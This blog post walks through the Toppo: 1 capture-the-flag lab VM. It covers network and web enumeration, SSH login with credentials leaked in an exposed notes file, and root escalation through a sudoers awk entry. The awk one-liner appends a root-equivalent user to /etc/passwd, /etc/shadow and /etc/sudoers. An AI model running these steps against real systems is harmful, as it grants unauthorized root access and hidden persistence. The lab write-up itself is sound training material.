Amonsec

It's all about security.

A simple blog where you can find different things about digital security.

Toppo: CTF walkthrough

Information

Name: Toppo: 1

Date release: 12 Jul 2018

 

Author: Hadi Mene

Series: Toppo

Note, I used VMWare Fusion for this one.

 

ENumeration

We can find with arp-scan the IP address of the VM.

ronin :~# arp-scan --localnet 
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
[redacted]    [redacted]    [redacted]
[redacted]    [redacted]    [redacted]
[redacted]    [redacted]    [redacted]
[redacted]    [redacted]    [redacted]
192.168.1.33    00:0c:29:66:8e:26    VMware, Inc.
[redacted]    [redacted]    [redacted]
[redacted]    [redacted]    [redacted]
[redacted]    [redacted]    [redacted]
[redacted]    [redacted]    [redacted]

9 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.409 seconds (106.27 hosts/sec). 9 responded
ronin :~# 

 

Then, we can use nmap to find open ports and running services.

ronin :~# nmap -sV -sC -T5 192.168.1.33
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-21 11:34 EDT
Nmap scan report for ronin.home (192.168.1.33)
Host is up (0.00058s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 ec:61:97:9f:4d:cb:75:99:59:d4:c1:c4:d4:3e:d9:dc (DSA)
|   2048 89:99:c4:54:9a:18:66:f7:cd:8e:ab:b6:aa:31:2e:c6 (RSA)
|   256 60:be:dd:8f:1a:d7:a3:f3:fe:21:cc:2f:11:30:7b:0d (ECDSA)
|_  256 39:d9:79:26:60:3d:6c:a2:1e:8b:19:71:c0:e2:5e:5f (ED25519)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|http-title: Clean Blog - Start Bootstrap Theme
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          59576/udp  status
|  100024  1          60520/tcp  status
MAC Address: 00:0C:29:66:8E:26 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.50 seconds
ronin :~# 
 

Publicly available informations

According to our nmap scan, we can see that a website is running in an Apache 2.4 server.

ronin :~# curl -X GET 'http:/192.168.1.33' -s | html2text









Start_Bootstrap  Menu
     Home
     About
     Sample_Post
     Contact

** Clean Blog **
A Blog Theme by Start Bootstrap

*_Man_must_explore,_and_this_is_exploration_at_itsgreatest*
_Problems_look_mighty_small_from_150_milesup
Posted by Start_Bootstrap on September 24, 2018
===============================================================================
*_I_believe_every_human_has_a_finite_number_of_heartbeats._I_don't_intend
to_waste_any_ofmine.*
Posted by Start_Bootstrap on September 18, 2018
===============================================================================
*_Science_has_not_yet_masteredprophecy*
_We_predict_too_much_for_the_next_year_and_yet_far_too_little_for_thenext
ten.
Posted by Start_Bootstrap on August 24, 2018
===============================================================================
*_Failure_is_not_anoption*
_Many_say_exploration_is_part_of_our_destiny,_but_it’s_actually_our_duty
to_futuregenerations.
Posted by Start_Bootstrap on July 8, 2018
===============================================================================
OlderPosts→
===============================================================================

    
    
    *
Copyright © Your Website 2018


ronin :~# 

 

So, the first thing that we can do is to enumerate directories and sub-directories. For that, we can use gobuster.

ronin :~# gobuster -u 'http://192.168.1.33/' -w /usr/share/seclists/Discovery/Web-Content/common.txt -e

Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.1.33/
[+] Threads      : 10
[+] Wordlist     : /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes : 200,204,301,302,307
[+] Expanded     : true
=====================================================
http://192.168.1.33/LICENSE (Status: 200)
http://192.168.1.33/admin (Status: 301)
http://192.168.1.33/css (Status: 301)
http://192.168.1.33/img (Status: 301)
http://192.168.1.33/index.html (Status: 200)
http://192.168.1.33/js (Status: 301)
http://192.168.1.33/mail (Status: 301)
http://192.168.1.33/manual (Status: 301)
http://192.168.1.33/vendor (Status: 301)
=====================================================
ronin :~# 

 

After few seconds, we can find a really interesting directory: /admin

In this directory we can find a text file that contains some SSH credentials.

ronin :~# curl -X GET 'http://192.168.1.33/admin/' -s | html2text 
** Index of /admin **
[[ICO]]       Name             Last_modified    Size Description
===========================================================================
[[PARENTDIR]] Parent_Directory                    -
[[TXT]] notes.txt 2018-04-15 11:16 154
=========================================================================== Apache/2.4.10 (Debian) Server at 192.168.1.33 Port 80 ronin :~# ronin :~# ronin :~# curl -X GET 'http://192.168.1.33/admin/notes.txt' -s | html2text Note to myself : I need to change my password :/ 12345ted123 is too outdated but the technology isn't my thing i prefer go fishing or watching soccer . ronin :~#

 

We can use those information to log in the system via SSH.

Username: ted (guessing)

Password: 12345ted123

ronin :~# ssh ted@192.168.1.33
ted@192.168.1.33's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 15 12:33:00 2018 from 192.168.0.29
ted@Toppo:~$ 
 

Privilege escalation

Due to the fact that the sudo command is unavailable, if we want to know if the ted user have weird permissions we have to read the /etc/sudoers file.

ted@Toppo:~$ cat /etc/sudoers 
ted ALL=(ALL) NOPASSWD: /usr/bin/awk

ted@Toppo:~$ 

 

File, which tell us that we can execute with root privileges and without password the /usr/bin/awk command.

Let's try simple commands in order to know if that can lead to a privilege escalation.

ted@Toppo:~$ /usr/bin/awk 'BEGIN{system("id;whoami")}'
uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
root
ted@Toppo:~$
ted@Toppo:~$ id; whoami
uid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
ted
ted@Toppo:~$ 

 

As we can see, while using the awk binary we have root privileges (euid=0), so, we can ad our own root user.

ted@Toppo:~$ /usr/bin/awk 'BEGIN{system("echo \"offsec:x:0:0:root:/root:/bin/bash\" >> /etc/passwd; echo \"offsec:\$1\$a6a731da\$yuZSHEEzlDQxCnlAMJQ8U1:16902:0:99999:7:::\" >> /etc/shadow; echo \"offsec ALL=(ALL) ALL\" >> /etc/sudoers")}'
ted@Toppo:~$
ted@Toppo:~$ su offsec
Password: 
root@Toppo:/home/ted# tail -1 /etc/passwd
offsec:x:0:0:root:/root:/bin/bash
root@Toppo:/home/ted#
root@Toppo:/home/ted# tail -1 /etc/shadow
offsec:$1$a6a731da$yuZSHEEzlDQxCnlAMJQ8U1:16902:0:99999:7:::
root@Toppo:/home/ted#
root@Toppo:/home/ted# tail -1 /etc/sudoers 
offsec ALL=(ALL) ALL
root@Toppo:/home/ted# 

 

Finally we can read the flag.

root@Toppo:/home/ted# cd /root/
root@Toppo:~# cat flag.txt 
_
| |
|/ | | \|.--. .--. .--. .--.
| | / .'\ \[ '/'\ [ '/'\ \/ .'\ \ | | | _. | | __/ | | __/ || __. | |__| '..' | ;./ | ;./ '..'
[| [|
Congratulations ! there is your flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce} root@Toppo:~#
toppo_root_flag.png
 
 

break